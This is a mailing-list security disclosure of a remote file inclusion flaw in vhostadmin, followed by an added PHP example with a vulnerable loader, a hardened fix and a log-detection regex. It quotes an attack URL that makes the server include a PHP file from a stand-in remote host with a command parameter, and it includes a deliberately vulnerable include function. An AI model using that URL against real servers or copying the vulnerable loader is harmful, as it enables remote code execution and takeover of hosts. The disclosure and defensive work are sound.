I know this is not exactly vpopmail-related, but as it's a vpopmail-related
tool I thought others here would like to be made aware of this.

I have been using vhostadmin for a while now, and have just noticed that
it is vulnerable to an xss attack which could lead to the underlying
system being cracked. The problem is the $MODULES_DIR var is not being
protected against injection of a remote path and simply accepts whatever
is passed to it, such as

http://server/path/to/vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d


A quick fix is to change global.inc and change 
$MODULES_DIR = 'modules';
to
define("MODULES_DIR", "modules");

and then change all references in any file it appears in of 

$MODULES_DIR 
to 
MODULES_DIR 

and comment out any references to 

global $MODULES_DIR;
to
//global $MODULES_DIR;


There may be other issues, but this one I came across yesterday when I
noticed the above formatted URL in the apache logs. Also, we have
modified some of the system ourselves, so it is entirely possible that
we may be partly to blame for some or all of this, but it would
certainly be worth watching out for if you are using the system.

Regards
Shane

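As an added example (not vhostadmin's own code, and not part of the post above), the following PHP shows the kind of module loader the post describes, why a request parameter can overwrite $MODULES_DIR, the hardened form using a constant plus an allow-list and a realpath() check, and a small helper that flags the log pattern Shane found. The module names, the loader functions and the sample log line are all assumptions constructed for illustration.

```php
<?php
// Added example, not vhostadmin's code. The loader below models the pattern
// described in the post; the function names and module list are assumed.

// --- Vulnerable pattern ---
// With register_globals=On (the PHP 4 default; the setting was removed in
// PHP 5.4), every request parameter becomes a global variable, so
// ?MODULES_DIR=http://remoteserver/path/to/bad/file.php? replaces the value
// assigned in global.inc. If remote includes are permitted, include() then
// fetches and executes the attacker's file. The trailing "?" in the injected
// value turns the rest of the include path into the remote file's query string.
function load_module_vulnerable($name)
{
    global $MODULES_DIR;                       // clobbered by ?MODULES_DIR=...
    include $MODULES_DIR . '/' . $name . '.php';
}

// --- Hardened pattern ---
// 1. A constant cannot be reassigned, so register_globals cannot override it.
// 2. The module name is checked against an allow-list of known modules, which
//    also blocks "../" traversal if the name ever comes from the request.
// 3. realpath() confirms the resolved file really sits under MODULES_DIR.
define('MODULES_DIR', __DIR__ . '/modules');

function load_module($name)
{
    static $allowed = array('main', 'domains', 'users');   // assumed list
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $base = realpath(MODULES_DIR);
    $path = realpath(MODULES_DIR . '/' . $name . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// --- Detection ---
// Flags Apache access-log lines where MODULES_DIR is set to a URL (plain or
// URL-encoded scheme separator) or to a directory-traversal sequence.
function is_rfi_attempt($logline)
{
    if (preg_match('#MODULES_DIR=(?:https?|ftp)(?:%3A|:)#i', $logline)) {
        return true;
    }
    if (preg_match('#MODULES_DIR=(?:\.\./|%2e%2e%2f)#i', $logline)) {
        return true;
    }
    return false;
}

// Constructed sample line in Apache common log format, modelled on the URL
// quoted in the post (not a real log entry).
$sample = '10.0.0.5 - - [01/Jan/2004:10:00:00 +0000] '
        . '"GET /vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d HTTP/1.0" 200 512';

if (is_rfi_attempt($sample)) {
    echo "remote include attempt: " . $sample . "\n";
}
```

The constant-based fix from the post removes the register_globals override, but a loader that still builds an include path from any request-controlled value remains exposed, which is why the hardened version also allow-lists the module name. Independently of the application, turning register_globals off in php.ini (and, on PHP versions that have it, allow_url_include) closes the same class of problem for every script on the host.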